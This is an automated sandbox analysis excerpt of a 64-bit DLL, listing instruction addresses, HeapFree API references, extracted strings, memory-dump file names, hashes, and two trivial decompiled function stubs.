0x7fef3047966
0x7fef304796d
0x7fef3047974
0x7fef3047978
0x7fef3047982
0x7fef3047989
0x7fef304798f
0x7fef3047991
0x7fef30479a1
0x7fef30479ac
0x7fef30479b0
0x7fef30479c3
0x7fef30479ce
0x7fef30479ee
0x7fef30479fe
0x7fef3047a06
0x7fef3047a14
0x7fef3047a2a
0x7fef3047a2e
0x7fef3047a36
0x7fef3047a4a
0x7fef3047a4f
0x7fef3047a62
0x7fef3047a67
0x7fef3047a6a
0x7fef3047a6d
0x7fef3047a72
0x7fef3047a80
0x7fef3047a88
0x7fef3047a93
0x7fef3047a95
0x7fef3047aa5
0x7fef3047aa9
0x7fef3047ab0
0x7fef3047ab5
0x7fef3047aba
0x7fef3047ac1
0x7fef3047ac8
0x7fef3047acc
0x7fef3047ad6
0x7fef3047add
0x7fef3047ae3
0x7fef3047ae5
0x7fef3047af5
0x7fef3047b00
0x7fef3047b04
0x7fef3047b17
0x7fef3047b22
0x7fef3047b42
0x7fef3047b52
0x7fef3047b5a
0x7fef3047b68
0x7fef3047b7e
0x7fef3047b82
0x7fef3047b8a
0x7fef3047b9e
0x7fef3047ba3
0x7fef3047bb6
0x7fef3047bbb
0x7fef3047bbe
0x7fef3047bc1
0x7fef3047bc6
0x7fef3047bd4
0x7fef3047bdc
0x7fef3047be7
0x7fef3047bef
0x7fef3047bf5
0x7fef3047c05
0x7fef3047c09
0x7fef3047c10
0x7fef3047c15
0x7fef3047c22
0x7fef3047c29
0x7fef3047c30
0x7fef3047c34
0x7fef3047c3e
0x7fef3047c45
0x7fef3047c4b
0x7fef3047c4d
0x7fef3047c61
0x7fef3047c68
0x7fef3047c6d
0x7fef3047c7a
0x7fef3047c81
0x7fef3047c88
0x7fef3047c8c
0x7fef3047c96
0x7fef3047c9d
0x7fef3047ca3
0x7fef3047ca5
0x7fef3047cb5
0x7fef3047cc0
0x7fef3047cc4
0x7fef3047cd7
0x7fef3047ce2
0x7fef3047d02
0x7fef3047d12
0x7fef3047d1a
0x7fef3047d28
0x7fef3047d3e
0x7fef3047d42
0x7fef3047d4a
0x7fef3047d5e
0x7fef3047d63
0x7fef3047d76
0x7fef3047d7b
0x7fef3047d7e
0x7fef3047d81
0x7fef3047d86
0x7fef3047d94
0x7fef3047d9c
0x7fef3047da7
0x7fef3047daf
0x7fef3047db1
0x7fef3047dc1
0x7fef3047dc5
0x7fef3047dcc
0x7fef3047dd1
0x7fef3047dde
0x7fef3047de5
0x7fef3047dec
0x7fef3047df0
0x7fef3047dfa
0x7fef3047e01
0x7fef3047e07
0x7fef3047e09
0x7fef3047e19
0x7fef3047e24
0x7fef3047e28
0x7fef3047e3b
0x7fef3047e46
0x7fef3047e66
0x7fef3047e76
0x7fef3047e7e
0x7fef3047e8c
0x7fef3047ea2
0x7fef3047ea6
0x7fef3047eae
0x7fef3047ec2
0x7fef3047ec7
0x7fef3047eda
0x7fef3047edf
0x7fef3047ee2
0x7fef3047ee5
0x7fef3047eed
0x7fef3047efb
0x7fef3047f03
0x7fef3047f0e
0x7fef3047f16
0x7fef3047f18
0x7fef3047f28
0x7fef3047f2c
0x7fef3047f33
0x7fef3047f38
0x7fef3047f45
0x7fef3047f4c
0x7fef3047f53
0x7fef3047f57
0x7fef3047f61
0x7fef3047f68
0x7fef3047f6e
0x7fef3047f70
0x7fef3047f80
0x7fef3047f8b
0x7fef3047f8f
0x7fef3047fa2
0x7fef3047fad
0x7fef3047fcd
0x7fef3047fdd
0x7fef3047fe5
0x7fef3047ff3
0x7fef3048009
0x7fef304800d
0x7fef3048015
0x7fef3048029
0x7fef304802e
0x7fef3048041
0x7fef3048046
0x7fef3048049
0x7fef304804f
0x7fef3048056
0x7fef3048064
0x7fef304806c
0x7fef3048077
0x7fef304807f
0x7fef3048081
0x7fef3048091
0x7fef3048095
0x7fef304809c
0x7fef30480a1
0x7fef30480ae
0x7fef30480b5
0x7fef30480bc
0x7fef30480c0
0x7fef30480ca
0x7fef30480d1
0x7fef30480d7
0x7fef30480d9
0x7fef30480e9
0x7fef30480f4
0x7fef30480f8
0x7fef304810b
0x7fef3048116
0x7fef3048136
0x7fef3048146
0x7fef304814e
0x7fef304815c
0x7fef3048172
0x7fef3048176
0x7fef304817e
0x7fef3048192
0x7fef3048197
0x7fef30481aa
0x7fef30481af
0x7fef30481b2
0x7fef30481b5
0x7fef30481bd
0x7fef30481cb
0x7fef30481d3
0x7fef30481de
0x7fef30481e6
0x7fef30481e8
0x7fef30481f8
0x7fef30481fc
0x7fef3048203
0x7fef3048208
0x7fef3048215
0x7fef304821c
0x7fef3048223
0x7fef3048227
0x7fef3048231
0x7fef3048238
0x7fef304823e
0x7fef3048240
0x7fef3048250
0x7fef304825b
0x7fef304825f
0x7fef3048272
0x7fef304827d
0x7fef304829d
0x7fef30482ad
0x7fef30482b5
0x7fef30482c3
0x7fef30482d9
0x7fef30482dd
0x7fef30482e5
0x7fef30482f9
0x7fef30482fe
0x7fef3048311
0x7fef3048316
0x7fef3048319
0x7fef304831c
0x7fef3048324
0x7fef3048332
0x7fef304833a
0x7fef3048345
0x7fef304834d
0x7fef304834f
0x7fef304835f
0x7fef3048363
0x7fef304836a
0x7fef304836f
0x7fef304837c
0x7fef3048383
0x7fef304838a
0x7fef304838e
0x7fef3048398
0x7fef304839f
0x7fef30483a5
0x7fef30483a7
0x7fef30483b7
0x7fef30483c2
0x7fef30483c6
0x7fef30483d9
0x7fef30483e4
0x7fef3048404
0x7fef3048414
0x7fef304841c
0x7fef304842a
0x7fef3048440
0x7fef3048444
0x7fef304844c
0x7fef3048460
0x7fef3048465
0x7fef3048478
0x7fef304847d
0x7fef3048480
0x7fef3048483
0x7fef304848b
0x7fef3048499
0x7fef30484a1
0x7fef30484ac
0x7fef30484b4
0x7fef30484b6
0x7fef30484c6
0x7fef30484ca
0x7fef30484d1
0x7fef30484d6
0x7fef30484e3
0x7fef30484ea
0x7fef30484f1
0x7fef30484f5
0x7fef30484ff
0x7fef3048506
0x7fef304850c
0x7fef304850e
0x7fef304851e
0x7fef3048529
0x7fef304852d
0x7fef3048540
0x7fef304854b
0x7fef304856b
0x7fef304857b
0x7fef3048583
0x7fef3048591
0x7fef30485a7
0x7fef30485ab
0x7fef30485b3
0x7fef30485c7
0x7fef30485cc
0x7fef30485df
0x7fef30485e4
0x7fef30485e7
0x7fef30485ea
0x7fef30485ef
0x7fef30485fd
0x7fef3048605
0x7fef3048610
0x7fef3048618
0x7fef304861a
0x7fef304862a
0x7fef304862e
0x7fef3048635
0x7fef304863a
0x7fef3048647
0x7fef304864e
0x7fef3048655
0x7fef3048659
0x7fef3048663
0x7fef304866a
0x7fef3048670
0x7fef3048672
0x7fef3048682
0x7fef304868d
0x7fef3048691
0x7fef30486a4
0x7fef30486af
0x7fef30486cf
0x7fef30486df
0x7fef30486e7
0x7fef30486f5
0x7fef304870b
0x7fef304870f
0x7fef3048717
0x7fef304872b
0x7fef3048730
0x7fef3048743
0x7fef3048748
0x7fef304874b
0x7fef304874e
0x7fef3048753
0x7fef3048761
0x7fef3048769
0x7fef3048774
0x7fef304877c
0x7fef304877e
0x7fef304878e
0x7fef3048792
0x7fef3048799
0x7fef304879e
0x7fef30487ab
0x7fef30487b2
0x7fef30487b9
0x7fef30487bd
0x7fef30487c7
0x7fef30487ce
0x7fef30487d4
0x7fef30487d6
0x7fef30487e6
0x7fef30487f1
0x7fef30487f5
0x7fef3048808
0x7fef3048813
0x7fef3048833
0x7fef3048843
0x7fef304884b
0x7fef3048859
0x7fef304886f
0x7fef3048873
0x7fef304887b
0x7fef304888f
0x7fef3048894
0x7fef30488a7
0x7fef30488ac
0x7fef30488af
0x7fef30488b2
0x7fef30488b7
0x7fef30488c5
0x7fef30488cd
0x7fef30488d8
0x7fef30488e0
0x7fef30488e2
0x7fef30488f2
0x7fef30488f6
0x7fef30488fd
0x7fef3048902
0x7fef304890f
0x7fef3048916
0x7fef304891d
0x7fef3048921
0x7fef304892b
0x7fef3048932
0x7fef3048938
0x7fef304893a
0x7fef304894a
0x7fef3048955
0x7fef3048959
0x7fef304896c
0x7fef3048977
0x7fef304897d
0x7fef304898d
0x7fef304899f
0x7fef30489af
0x7fef30489b7
0x7fef30489c5
0x7fef30489db
0x7fef30489df
0x7fef30489e7
0x7fef30489fb
0x7fef3048a00
0x7fef3048a13
0x7fef3048a18
0x7fef3048a1b
0x7fef3048a21
0x7fef3048a25
0x7fef3048a33
0x7fef3048a3b
0x7fef3048a46
0x7fef3048a48
0x7fef3048a4f
0x7fef3048a66
0x7fef3048a6b
0x7fef3048a70
0x7fef3048a7e
0x7fef3048a85
0x7fef3048a8b
0x7fef3048a98
0x7fef3048a9a
0x7fef3048aaa
0x7fef3048ab5
0x7fef3048ab9
0x7fef3048acc
0x7fef3048ad7
0x7fef3048add
0x7fef3048aed
0x7fef3048aff
0x7fef3048b0f
0x7fef3048b17
0x7fef3048b25
0x7fef3048b3b
0x7fef3048b3f
0x7fef3048b47
0x7fef3048b5b
0x7fef3048b60
0x7fef3048b73
0x7fef3048b78
0x7fef3048b7b
0x7fef3048b7e
0x7fef3048b83
0x7fef3048b91
0x7fef3048b99
0x7fef3048ba4
0x7fef3048ba6
0x7fef3048bad
0x7fef3048bc5
0x7fef3048bca
0x7fef3048bcf
0x7fef3048bdd
0x7fef3048be4
0x7fef3048bea
0x7fef3048bf7
0x7fef3048bf9
0x7fef3048c09
0x7fef3048c14
0x7fef3048c18
0x7fef3048c2b
0x7fef3048c36
0x7fef3048c56
0x7fef3048c66
0x7fef3048c6e
0x7fef3048c7c
0x7fef3048c92
0x7fef3048c96
0x7fef3048c9e
0x7fef3048cb2
0x7fef3048cca
0x7fef3048ccf
0x7fef3048cdd
0x7fef3048ce2
0x7fef3048ce6
0x7fef3048ce9
0x7fef3048cee
0x7fef3048cfc
0x7fef3048d04
0x7fef3048d0f
0x7fef3048d11
0x7fef3048d18
0x7fef3048d28
0x7fef3048d30
0x7fef3048d35
0x7fef3048d3a
0x7fef3048d48
0x7fef3048d4f
0x7fef3048d56
0x7fef3048d5d
0x7fef3048d63
0x7fef3048d65
0x7fef3048d75
0x7fef3048d80
0x7fef3048d84
0x7fef3048d97
0x7fef3048da2
0x7fef3048dc2
0x7fef3048dd2
0x7fef3048dda
0x7fef3048de8
0x7fef3048dfe
0x7fef3048e02
0x7fef3048e0a
0x7fef3048e1e
0x7fef3048e39
0x7fef3048e3e
0x7fef3048e4c
0x7fef3048e51
0x7fef3048e57
0x7fef3048e65
0x7fef3048e6d
0x7fef3048e78
0x7fef3048e7a
0x7fef3048e81
0x7fef3048e91
0x7fef3048e98
0x7fef3048e9d
0x7fef3048ea2
0x7fef3048ea9
0x7fef3048eb0
0x7fef3048eb7
0x7fef3048ebb
0x7fef3048ebe
0x7fef3048ecb
0x7fef3048eec
0x7fef3048ef3
0x7fef3048efb
0x7fef3048f02
0x7fef3048f06
0x7fef3048f0e
0x7fef3048f15
0x7fef3048f19
0x7fef3048f21
0x7fef3048f28
0x7fef3048f2c
0x7fef3048f34
0x7fef3048f3b
0x7fef3048f46
0x7fef3048f54
0x7fef3048f63
0x7fef3048f76
0x7fef3048f85
0x7fef3048f93
0x7fef3048fa2
0x7fef3048fb5
0x7fef3048fc4
0x7fef3048fd2
0x7fef3048fe1
0x7fef3048ff4
0x7fef304900b
0x7fef3049019
0x7fef3049028
0x7fef304903b
0x7fef304905a
0x7fef304906d
0x7fef304907c
0x7fef304908f
0x7fef304909e
0x7fef30490b1
0x7fef30490c0
0x7fef30490d3
0x7fef30490e2
0x7fef30490f5
0x7fef3049104
0x7fef3049117
0x7fef3049126
0x7fef3049139
0x7fef3049148
0x7fef304915b
0x7fef304916a
0x7fef304917d
0x7fef304918c
0x7fef304919f
0x7fef30491ae
0x7fef30491c1
0x7fef30491d0
0x7fef30491e3
0x7fef30491f2
0x7fef3049205
0x7fef3049214
0x7fef3049227
0x7fef3049236
0x7fef3049249
0x7fef3049258
0x7fef304926b
0x7fef304927a
0x7fef304928d
0x7fef304929c
0x7fef30492af
0x7fef30492be
0x7fef30492d1
0x7fef30492e0
0x7fef30492f3
0x7fef3049302
0x7fef3049310
0x7fef304931f
0x7fef3049332
0x7fef3049341
0x7fef3049354
0x7fef3049363
0x7fef3049376
0x7fef3049382
0x7fef3049395
0x7fef30493a4
0x7fef30493b7
0x7fef30493c3
0x7fef30493d6
0x7fef30493e5
0x7fef30493f8
0x7fef3049401
0x7fef304940f
0x7fef3049417
0x7fef304941f
0x7fef3049426
0x7fef3049431
0x7fef3049444
0x7fef304944c
0x7fef304945b
0x7fef3049466
0x7fef3049479
0x7fef3049488
0x7fef304949b
0x7fef30494a7
0x7fef30494b7
0x7fef30494bf
0x7fef30494cc
0x7fef30494d6
0x7fef30494d8
0x7fef30494e0
0x7fef30494f3
0x7fef3049501
0x7fef3049518
0x7fef3049526
0x7fef304952c
0x7fef304953f
0x7fef3049552
0x7fef3049561
0x7fef304956f
0x7fef3049586
0x7fef3049599
0x7fef30495a8
0x7fef30495b6
0x7fef30495cd
0x7fef30495e0
0x7fef30495ef
0x7fef3049602
0x7fef3049611
0x7fef3049624
0x7fef3049633
0x7fef3049646
0x7fef3049655
0x7fef3049668
0x7fef3049677
0x7fef304968a
0x7fef3049699
0x7fef30496ac
0x7fef30496bb
0x7fef30496ce
0x7fef30496dd
0x7fef30496f0
0x7fef30496ff
0x7fef3049712
0x7fef3049721
0x7fef3049734
0x7fef3049743
0x7fef3049756
0x7fef3049765
0x7fef3049778
0x7fef3049787
0x7fef304979a
0x7fef30497a9
0x7fef30497bc
0x7fef30497cb
0x7fef30497de
0x7fef30497ed
0x7fef3049800
0x7fef304980f
0x7fef3049822
0x7fef3049831
0x7fef3049844
0x7fef3049853
0x7fef3049866
0x7fef3049875
0x7fef3049888
0x7fef3049897
0x7fef30498a5
0x7fef30498b4
0x7fef30498c7
0x7fef30498d6
0x7fef30498e9
0x7fef30498f8
0x7fef304990b
0x7fef3049917
0x7fef304992a
0x7fef3049930
0x7fef3049935
0x7fef3049943
0x7fef3049956
0x7fef304995f
0x7fef3049972
0x7fef3049978
0x7fef304998a
0x7fef304999d
0x7fef30499ac
0x7fef30499ba
0x7fef30499c2
0x7fef30499ca
0x7fef30499d1
0x7fef30499dc
0x7fef30499ef
0x7fef30499f7
0x7fef3049a06
0x7fef3049a11
0x7fef3049a24
0x7fef3049a33
0x7fef3049a46
0x7fef3049a52
0x7fef3049a62
0x7fef3049a6d
0x7fef3049a78
0x7fef3049a8b
0x7fef3049a96
0x7fef3049aa1
0x7fef3049ab4
0x7fef3049abf
0x7fef3049aca
0x7fef3049add
0x7fef3049ae8
0x7fef3049af3
0x7fef3049b06
0x7fef3049b11
0x7fef3049b1c
0x7fef3049b2f
0x7fef3049b3a
0x7fef3049b45
0x7fef3049b58
0x7fef3049b66
0x7fef3049b71
0x7fef3049b84
0x7fef3049b92
0x7fef3049b9d
0x7fef3049bb0
0x7fef3049bbe
0x7fef3049bc9
0x7fef3049bdc
0x7fef3049bea
0x7fef3049bf5
0x7fef3049c08
0x7fef3049c16
0x7fef3049c21
0x7fef3049c34
0x7fef3049c3c
0x7fef3049c47
0x7fef3049c5a
0x7fef3049c63
0x7fef3049c6e
0x7fef3049c81
0x7fef3049c8a
0x7fef3049c95
0x7fef3049ca8
0x7fef3049cb1
0x7fef3049cbc
0x7fef3049ccf
0x7fef3049cd8
0x7fef3049ce3
0x7fef3049cf6
0x7fef3049cff
0x7fef3049d0a
0x7fef3049d1d
0x7fef3049d2e
0x7fef3049d33
0x7fef3049d5c

APIs

HeapFree.KERNEL32 ref: 000007FEF3047469
HeapFree.KERNEL32 ref: 000007FEF30475EB
HeapFree.KERNEL32 ref: 000007FEF304774B
HeapFree.KERNEL32 ref: 000007FEF30478B0
HeapFree.KERNEL32 ref: 000007FEF3047A14
HeapFree.KERNEL32 ref: 000007FEF3047B68
HeapFree.KERNEL32 ref: 000007FEF3047D28
HeapFree.KERNEL32 ref: 000007FEF3047E8C
HeapFree.KERNEL32 ref: 000007FEF3047FF3
HeapFree.KERNEL32 ref: 000007FEF304815C
HeapFree.KERNEL32 ref: 000007FEF30482C3
HeapFree.KERNEL32 ref: 000007FEF304842A
HeapFree.KERNEL32 ref: 000007FEF3048591
HeapFree.KERNEL32 ref: 000007FEF30486F5
HeapFree.KERNEL32 ref: 000007FEF3048859
HeapFree.KERNEL32 ref: 000007FEF30489C5
HeapFree.KERNEL32 ref: 000007FEF3048B25
HeapFree.KERNEL32 ref: 000007FEF3048C7C
HeapFree.KERNEL32 ref: 000007FEF3048DE8
HeapFree.KERNEL32 ref: 000007FEF3048F54
HeapFree.KERNEL32 ref: 000007FEF3048F76
HeapFree.KERNEL32 ref: 000007FEF3048F93
HeapFree.KERNEL32 ref: 000007FEF3048FB5
HeapFree.KERNEL32 ref: 000007FEF3048FD2
HeapFree.KERNEL32 ref: 000007FEF3048FF4
HeapFree.KERNEL32 ref: 000007FEF3049019
HeapFree.KERNEL32 ref: 000007FEF304903B
HeapFree.KERNEL32 ref: 000007FEF304906D
HeapFree.KERNEL32 ref: 000007FEF304908F
HeapFree.KERNEL32 ref: 000007FEF30490B1
HeapFree.KERNEL32 ref: 000007FEF30490D3
HeapFree.KERNEL32 ref: 000007FEF30490F5
HeapFree.KERNEL32 ref: 000007FEF3049117
HeapFree.KERNEL32 ref: 000007FEF3049139
HeapFree.KERNEL32 ref: 000007FEF304915B
HeapFree.KERNEL32 ref: 000007FEF304917D
HeapFree.KERNEL32 ref: 000007FEF304919F
HeapFree.KERNEL32 ref: 000007FEF30491C1
HeapFree.KERNEL32 ref: 000007FEF30491E3
HeapFree.KERNEL32 ref: 000007FEF3049205
HeapFree.KERNEL32 ref: 000007FEF3049227
HeapFree.KERNEL32 ref: 000007FEF3049249
HeapFree.KERNEL32 ref: 000007FEF304926B
HeapFree.KERNEL32 ref: 000007FEF304928D
HeapFree.KERNEL32 ref: 000007FEF30492AF
HeapFree.KERNEL32 ref: 000007FEF30492D1
HeapFree.KERNEL32 ref: 000007FEF30492F3
HeapFree.KERNEL32 ref: 000007FEF3049310
HeapFree.KERNEL32 ref: 000007FEF3049332
HeapFree.KERNEL32 ref: 000007FEF3049354
HeapFree.KERNEL32 ref: 000007FEF3049376
HeapFree.KERNEL32 ref: 000007FEF3049395
HeapFree.KERNEL32 ref: 000007FEF30493B7
HeapFree.KERNEL32 ref: 000007FEF30493D6
HeapFree.KERNEL32 ref: 000007FEF30493F8
HeapFree.KERNEL32 ref: 000007FEF304940F
HeapFree.KERNEL32 ref: 000007FEF3049444
HeapFree.KERNEL32 ref: 000007FEF3049479
HeapFree.KERNEL32 ref: 000007FEF304949B
HeapFree.KERNEL32 ref: 000007FEF30494B7
HeapFree.KERNEL32 ref: 000007FEF3049552
HeapFree.KERNEL32 ref: 000007FEF304956F
HeapFree.KERNEL32 ref: 000007FEF3049599
HeapFree.KERNEL32 ref: 000007FEF30495B6
HeapFree.KERNEL32 ref: 000007FEF30495E0
HeapFree.KERNEL32 ref: 000007FEF3049602
HeapFree.KERNEL32 ref: 000007FEF3049624
HeapFree.KERNEL32 ref: 000007FEF3049646
HeapFree.KERNEL32 ref: 000007FEF3049668
HeapFree.KERNEL32 ref: 000007FEF304968A
HeapFree.KERNEL32 ref: 000007FEF30496AC
HeapFree.KERNEL32 ref: 000007FEF30496CE
HeapFree.KERNEL32 ref: 000007FEF30496F0
HeapFree.KERNEL32 ref: 000007FEF3049712
HeapFree.KERNEL32 ref: 000007FEF3049734
HeapFree.KERNEL32 ref: 000007FEF3049756
HeapFree.KERNEL32 ref: 000007FEF3049778
HeapFree.KERNEL32 ref: 000007FEF304979A
HeapFree.KERNEL32 ref: 000007FEF30497BC
HeapFree.KERNEL32 ref: 000007FEF30497DE
HeapFree.KERNEL32 ref: 000007FEF3049800
HeapFree.KERNEL32 ref: 000007FEF3049822
HeapFree.KERNEL32 ref: 000007FEF3049844
HeapFree.KERNEL32 ref: 000007FEF3049866
HeapFree.KERNEL32 ref: 000007FEF3049888
HeapFree.KERNEL32 ref: 000007FEF30498A5
HeapFree.KERNEL32 ref: 000007FEF30498C7
HeapFree.KERNEL32 ref: 000007FEF30498E9
HeapFree.KERNEL32 ref: 000007FEF304990B
HeapFree.KERNEL32 ref: 000007FEF304992A
HeapFree.KERNEL32 ref: 000007FEF3049956
HeapFree.KERNEL32 ref: 000007FEF3049972
HeapFree.KERNEL32 ref: 000007FEF304999D
HeapFree.KERNEL32 ref: 000007FEF30499BA
HeapFree.KERNEL32 ref: 000007FEF30499EF
HeapFree.KERNEL32 ref: 000007FEF3049A24
HeapFree.KERNEL32 ref: 000007FEF3049A46
HeapFree.KERNEL32 ref: 000007FEF3049A62
HeapFree.KERNEL32 ref: 000007FEF3049A8B
HeapFree.KERNEL32 ref: 000007FEF3049AB4
HeapFree.KERNEL32 ref: 000007FEF3049ADD
HeapFree.KERNEL32 ref: 000007FEF3049B06
HeapFree.KERNEL32 ref: 000007FEF3049B2F
HeapFree.KERNEL32 ref: 000007FEF3049B58
HeapFree.KERNEL32 ref: 000007FEF3049B84
HeapFree.KERNEL32 ref: 000007FEF3049BB0
HeapFree.KERNEL32 ref: 000007FEF3049BDC
HeapFree.KERNEL32 ref: 000007FEF3049C08
HeapFree.KERNEL32 ref: 000007FEF3049C34
HeapFree.KERNEL32 ref: 000007FEF3049C5A
HeapFree.KERNEL32 ref: 000007FEF3049C81
HeapFree.KERNEL32 ref: 000007FEF3049CA8
HeapFree.KERNEL32 ref: 000007FEF3049CCF
HeapFree.KERNEL32 ref: 000007FEF3049CF6
HeapFree.KERNEL32 ref: 000007FEF3049D1D
HeapFree.KERNEL32 ref: 000007FEF3049D3E

Strings

d0, xrefs: 000007FEF304571A
Pf4, xrefs: 000007FEF3047942, 000007FEF304796D
p`4, xrefs: 000007FEF30484BF, 000007FEF30484EA
called `Result::unwrap()` on an `Err` value, xrefs: 000007FEF304A9DE, 000007FEF304AC58
@`4, xrefs: 000007FEF30477DE, 000007FEF3047809
0X3, xrefs: 000007FEF30488EB, 000007FEF3048916
TL}g, xrefs: 000007FEF3045413
6j, xrefs: 000007FEF3045B7D
P`4, xrefs: 000007FEF3047A9E, 000007FEF3047AC1
``4, xrefs: 000007FEF3048358, 000007FEF3048383

Memory Dump Source

Source File: 00000001.00000002.915284627.000007FEF3041000.00000020.00000001.01000000.00000003.sdmp, Offset: 000007FEF3040000, based on PE: true

Associated: 00000001.00000002.915280675.000007FEF3040000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915354749.000007FEF3101000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915485518.000007FEF3169000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915525428.000007FEF319C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915532692.000007FEF319F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7fef3040000_loaddll64.jbxd

Similarity

API ID: FreeHeap
String ID: 0X3$6j$@`4$P`4$Pf4$TL}g$``4$called `Result::unwrap()` on an `Err` value$d0$p`4
API String ID: 3298025750-2517502174
Opcode ID: c72136f08b769b7ea642865ffff6d8f5b73c3c63baac4d90be9aa744df6e02ad
Instruction ID: b37f5b01b615997dafbc72ed2c2581309bbc2a4a1fe905df27e8c0d93f20d323
Opcode Fuzzy Hash: c72136f08b769b7ea642865ffff6d8f5b73c3c63baac4d90be9aa744df6e02ad
Instruction Fuzzy Hash: F2B38F76A0DBC189E7B18B15E4443EAB3A2F789B84F448226CACD17B69DF3CD585D700

Uniqueness

Uniqueness Score: -1.00%

Function 000007FEF30452A6 Relevance: 106.7, APIs: 60, Strings: 9, Instructions: 3234
memoryCOMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E000007FE7FEF30452A6(void* __ebx, intOrPtr* __rax) {

				 *__rax =  *__rax +  *0xc5000000;
			}

0x7fef30452af

APIs

HeapFree.KERNEL32 ref: 000007FEF3047469
HeapFree.KERNEL32 ref: 000007FEF30475EB
HeapFree.KERNEL32 ref: 000007FEF304774B
HeapFree.KERNEL32 ref: 000007FEF30478B0
HeapFree.KERNEL32 ref: 000007FEF3047A14
HeapFree.KERNEL32 ref: 000007FEF3047B68
HeapFree.KERNEL32 ref: 000007FEF3047D28
HeapFree.KERNEL32 ref: 000007FEF3047E8C
HeapFree.KERNEL32 ref: 000007FEF3047FF3
HeapFree.KERNEL32 ref: 000007FEF304815C
HeapFree.KERNEL32 ref: 000007FEF30482C3
HeapFree.KERNEL32 ref: 000007FEF304842A
HeapFree.KERNEL32 ref: 000007FEF3048591
HeapFree.KERNEL32 ref: 000007FEF30486F5
HeapFree.KERNEL32 ref: 000007FEF3048859
HeapFree.KERNEL32 ref: 000007FEF30489C5
HeapFree.KERNEL32 ref: 000007FEF3048B25
HeapFree.KERNEL32 ref: 000007FEF3048C7C
HeapFree.KERNEL32 ref: 000007FEF3048DE8
HeapFree.KERNEL32 ref: 000007FEF3048F54
HeapFree.KERNEL32 ref: 000007FEF3048F76
HeapFree.KERNEL32 ref: 000007FEF3048F93
HeapFree.KERNEL32 ref: 000007FEF3048FB5
HeapFree.KERNEL32 ref: 000007FEF3048FD2
HeapFree.KERNEL32 ref: 000007FEF3048FF4
HeapFree.KERNEL32 ref: 000007FEF3049019
HeapFree.KERNEL32 ref: 000007FEF304903B
HeapFree.KERNEL32 ref: 000007FEF304906D
HeapFree.KERNEL32 ref: 000007FEF304908F
HeapFree.KERNEL32 ref: 000007FEF30490B1
HeapFree.KERNEL32 ref: 000007FEF30490D3
HeapFree.KERNEL32 ref: 000007FEF30490F5
HeapFree.KERNEL32 ref: 000007FEF3049117
HeapFree.KERNEL32 ref: 000007FEF3049139
HeapFree.KERNEL32 ref: 000007FEF304915B
HeapFree.KERNEL32 ref: 000007FEF304917D
HeapFree.KERNEL32 ref: 000007FEF304919F
HeapFree.KERNEL32 ref: 000007FEF30491C1
HeapFree.KERNEL32 ref: 000007FEF30491E3
HeapFree.KERNEL32 ref: 000007FEF3049205
HeapFree.KERNEL32 ref: 000007FEF3049227
HeapFree.KERNEL32 ref: 000007FEF3049249
HeapFree.KERNEL32 ref: 000007FEF304926B
HeapFree.KERNEL32 ref: 000007FEF304928D
HeapFree.KERNEL32 ref: 000007FEF30492AF
HeapFree.KERNEL32 ref: 000007FEF30492D1
HeapFree.KERNEL32 ref: 000007FEF30492F3
HeapFree.KERNEL32 ref: 000007FEF3049310
HeapFree.KERNEL32 ref: 000007FEF3049332
HeapFree.KERNEL32 ref: 000007FEF3049354
HeapFree.KERNEL32 ref: 000007FEF3049376
HeapFree.KERNEL32 ref: 000007FEF3049395
HeapFree.KERNEL32 ref: 000007FEF30493B7
HeapFree.KERNEL32 ref: 000007FEF30493D6
HeapFree.KERNEL32 ref: 000007FEF30493F8
HeapFree.KERNEL32 ref: 000007FEF304940F
HeapFree.KERNEL32 ref: 000007FEF3049444
HeapFree.KERNEL32 ref: 000007FEF3049479
HeapFree.KERNEL32 ref: 000007FEF304949B
HeapFree.KERNEL32 ref: 000007FEF30494B7

Strings

d0, xrefs: 000007FEF304571A
Pf4, xrefs: 000007FEF3047942, 000007FEF304796D
p`4, xrefs: 000007FEF30484BF, 000007FEF30484EA
@`4, xrefs: 000007FEF30477DE, 000007FEF3047809
0X3, xrefs: 000007FEF30488EB, 000007FEF3048916
TL}g, xrefs: 000007FEF3045413
6j, xrefs: 000007FEF3045B7D
P`4, xrefs: 000007FEF3047A9E, 000007FEF3047AC1
``4, xrefs: 000007FEF3048358, 000007FEF3048383

Memory Dump Source

Source File: 00000001.00000002.915284627.000007FEF3041000.00000020.00000001.01000000.00000003.sdmp, Offset: 000007FEF3040000, based on PE: true

Associated: 00000001.00000002.915280675.000007FEF3040000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915354749.000007FEF3101000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915485518.000007FEF3169000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915525428.000007FEF319C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915532692.000007FEF319F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7fef3040000_loaddll64.jbxd

Similarity

API ID: FreeHeap
String ID: 0X3$6j$@`4$P`4$Pf4$TL}g$``4$d0$p`4
API String ID: 3298025750-510520714
Opcode ID: 5db42d8b9aad90812f2038f013ad9f486f1281912a8c0d3823faed1360416d31
Instruction ID: 2741ee41b982e27a2dbe2a99f5f4e0303a3294789e227e23f4b0c737dccbd3a3
Opcode Fuzzy Hash: 5db42d8b9aad90812f2038f013ad9f486f1281912a8c0d3823faed1360416d31
Instruction Fuzzy Hash: 15837176A09BC589E6B18B15E4443EAB3A2F789B84F449223CECD13B69DF3CD585D700

Uniqueness

Uniqueness Score: -1.00%

Function 000007FEF304F85D Relevance: 83.7, APIs: 43, Strings: 4, Instructions: 1409
COMMONCrypto

Download Yara Rule

C-Code - Quality: 37%

			E000007FE7FEF304F85D(void* __edx) {

				asm("movaps [esp+0x170], xmm6");
				if (__edx == 1) goto 0xf304f89e;
				asm("movaps xmm6, [esp+0x170]");
				return 1;
			}

0x7fef304f870
0x7fef304f87b
0x7fef304f882
0x7fef304f89d

Strings

attempt to join into collection with len > usize::MAX/rustc/7eef946fc0e0eff40e588eab77b09b287accbec3\library\alloc\src\str.rs, xrefs: 000007FEF3050553
